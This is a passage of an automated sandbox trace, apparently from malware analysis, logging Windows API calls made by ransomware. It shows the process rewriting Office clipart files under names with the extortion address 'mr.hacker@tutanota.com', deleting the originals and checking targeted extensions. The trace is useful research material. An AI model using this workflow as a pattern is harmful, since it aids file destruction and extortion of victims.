Office\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf")) returned 0x20 [0271.847] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.847] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.847] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.848] GetLastError () returned 0x0 [0271.848] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0xf94, lpOverlapped=0x0) returned 1 [0271.850] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xfa0, lpOverlapped=0x0) returned 1 [0271.851] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.851] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.851] SetEndOfFile (hFile=0x2a8) returned 1 [0271.851] CloseHandle (hObject=0x2a8) returned 1 [0271.851] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.851] SetEndOfFile (hFile=0x390) returned 1 [0271.853] CloseHandle (hObject=0x390) returned 1 [0271.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.854] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02116_.wmf")) returned 1 [0271.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.854] lstrlenW (lpString=".doc") returned 4 [0271.854] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.854] lstrlenW (lpString=".docx") returned 5 [0271.854] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.854] lstrlenW (lpString=".pdf") returned 4 [0271.854] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.854] lstrlenW (lpString=".xls") returned 4 [0271.854] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.854] lstrlenW (lpString=".xlsx") returned 5 [0271.854] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.854] lstrlenW (lpString=".ppt") returned 4 [0271.854] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.854] lstrlenW (lpString=".zip") returned 4 [0271.854] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.854] lstrlenW (lpString=".rar") returned 4 [0271.854] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.854] lstrlenW (lpString=".bz2") returned 4 [0271.854] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.854] lstrlenW (lpString=".7z") returned 3 [0271.854] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.854] lstrlenW (lpString=".dbf") returned 4 [0271.854] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.855] lstrlenW (lpString=".1cd") returned 4 [0271.855] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.855] lstrlenW (lpString=".jpg") returned 4 [0271.855] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.855] lstrlenW (lpString=".doc") returned 4 [0271.855] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.855] lstrlenW (lpString=".docx") returned 5 [0271.855] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.855] lstrlenW (lpString=".pdf") returned 4 [0271.855] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.855] lstrlenW (lpString=".xls") returned 4 [0271.855] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.855] lstrlenW (lpString=".xlsx") returned 5 [0271.855] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.855] lstrlenW (lpString=".ppt") returned 4 [0271.855] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.855] lstrlenW (lpString=".zip") returned 4 [0271.855] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.855] lstrlenW (lpString=".rar") returned 4 [0271.855] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.855] lstrlenW (lpString=".bz2") returned 4 [0271.856] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.856] lstrlenW (lpString=".7z") returned 3 [0271.856] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.856] lstrlenW (lpString=".dbf") returned 4 [0271.856] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.856] lstrlenW (lpString=".1cd") returned 4 [0271.856] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 63 [0271.856] lstrlenW (lpString=".jpg") returned 4 [0271.856] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.856] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.856] lstrlenW (lpString="FD02141_.WMF") returned 12 [0271.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.857] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2636) returned 1 [0271.857] CloseHandle (hObject=0x390) returned 1 [0271.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf")) returned 0x20 [0271.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.857] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.857] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.858] GetLastError () returned 0x0 [0271.858] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0xa4c, lpOverlapped=0x0) returned 1 [0271.912] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xa50, lpOverlapped=0x0) returned 1 [0271.912] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.913] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.913] SetEndOfFile (hFile=0x2a8) returned 1 [0271.913] CloseHandle (hObject=0x2a8) returned 1 [0271.913] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.913] SetEndOfFile (hFile=0x390) returned 1 [0271.915] CloseHandle (hObject=0x390) returned 1 [0271.915] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.940] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf")) returned 1 [0271.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.960] lstrlenW (lpString=".doc") returned 4 [0271.960] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.960] lstrlenW (lpString=".docx") returned 5 [0271.960] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.960] lstrlenW (lpString=".pdf") returned 4 [0271.960] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.960] lstrlenW (lpString=".xls") returned 4 [0271.960] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.960] lstrlenW (lpString=".xlsx") returned 5 [0271.960] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.960] lstrlenW (lpString=".ppt") returned 4 [0271.960] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.960] lstrlenW (lpString=".zip") returned 4 [0271.960] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.960] lstrlenW (lpString=".rar") returned 4 [0271.960] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.960] lstrlenW (lpString=".bz2") returned 4 [0271.960] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.960] lstrlenW (lpString=".7z") returned 3 [0271.960] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.960] lstrlenW (lpString=".dbf") returned 4 [0271.960] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.960] lstrlenW (lpString=".1cd") returned 4 [0271.960] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.960] lstrlenW (lpString=".jpg") returned 4 [0271.960] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.961] lstrlenW (lpString=".doc") returned 4 [0271.961] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.961] lstrlenW (lpString=".docx") returned 5 [0271.961] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.961] lstrlenW (lpString=".pdf") returned 4 [0271.961] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.961] lstrlenW (lpString=".xls") returned 4 [0271.961] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.961] lstrlenW (lpString=".xlsx") returned 5 [0271.961] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.961] lstrlenW (lpString=".ppt") returned 4 [0271.961] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.961] lstrlenW (lpString=".zip") returned 4 [0271.961] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.961] lstrlenW (lpString=".rar") returned 4 [0271.961] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.961] lstrlenW (lpString=".bz2") returned 4 [0271.961] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.961] lstrlenW (lpString=".7z") returned 3 [0271.961] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.961] lstrlenW (lpString=".dbf") returned 4 [0271.961] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.961] lstrlenW (lpString=".1cd") returned 4 [0271.961] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63 [0271.961] lstrlenW (lpString=".jpg") returned 4 [0271.962] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.962] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.962] lstrlenW (lpString="HH00231_.WMF") returned 12 [0271.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.135] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2232) returned 1 [0272.135] CloseHandle (hObject=0x39c) returned 1 [0272.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf")) returned 0x20 [0272.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.142] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.142] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.143] GetLastError () returned 0x0 [0272.143] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x8b8, lpOverlapped=0x0) returned 1 [0272.154] WriteFile (in: hFile=0x39c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x8c0, lpOverlapped=0x0) returned 1 [0272.155] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.155] WriteFile (in: hFile=0x39c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.155] SetEndOfFile (hFile=0x39c) returned 1 [0272.155] CloseHandle (hObject=0x39c) returned 1 [0272.155] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.155] SetEndOfFile (hFile=0x388) returned 1 [0272.157] CloseHandle (hObject=0x388) returned 1 [0272.157] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.164] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf")) returned 1 [0272.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.164] lstrlenW (lpString=".doc") returned 4 [0272.164] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.164] lstrlenW (lpString=".docx") returned 5 [0272.164] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.164] lstrlenW (lpString=".pdf") returned 4 [0272.164] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.164] lstrlenW (lpString=".xls") returned 4 [0272.164] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.164] lstrlenW (lpString=".xlsx") returned 5 [0272.164] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.164] lstrlenW (lpString=".ppt") returned 4 [0272.164] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.164] lstrlenW (lpString=".zip") returned 4 [0272.164] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.164] lstrlenW (lpString=".rar") returned 4 [0272.164] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.164] lstrlenW (lpString=".bz2") returned 4 [0272.164] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.165] lstrlenW (lpString=".7z") returned 3 [0272.165] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.165] lstrlenW (lpString=".dbf") returned 4 [0272.165] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.165] lstrlenW (lpString=".1cd") returned 4 [0272.165] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.165] lstrlenW (lpString=".jpg") returned 4 [0272.165] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.165] lstrlenW (lpString=".doc") returned 4 [0272.165] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.165] lstrlenW (lpString=".docx") returned 5 [0272.165] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.165] lstrlenW (lpString=".pdf") returned 4 [0272.165] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.165] lstrlenW (lpString=".xls") returned 4 [0272.165] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.165] lstrlenW (lpString=".xlsx") returned 5 [0272.165] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.165] lstrlenW (lpString=".ppt") returned 4 [0272.165] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.165] lstrlenW (lpString=".zip") returned 4 [0272.165] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.165] lstrlenW (lpString=".rar") returned 4 [0272.165] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.165] lstrlenW (lpString=".bz2") returned 4 [0272.166] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.166] lstrlenW (lpString=".7z") returned 3 [0272.166] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.166] lstrlenW (lpString=".dbf") returned 4 [0272.166] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.166] lstrlenW (lpString=".1cd") returned 4 [0272.166] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 63 [0272.166] lstrlenW (lpString=".jpg") returned 4 [0272.166] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.166] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.166] lstrlenW (lpString="HH00334_.WMF") returned 12 [0272.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.174] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=1528) returned 1 [0272.174] CloseHandle (hObject=0x328) returned 1 [0272.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf")) returned 0x20 [0272.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf"), 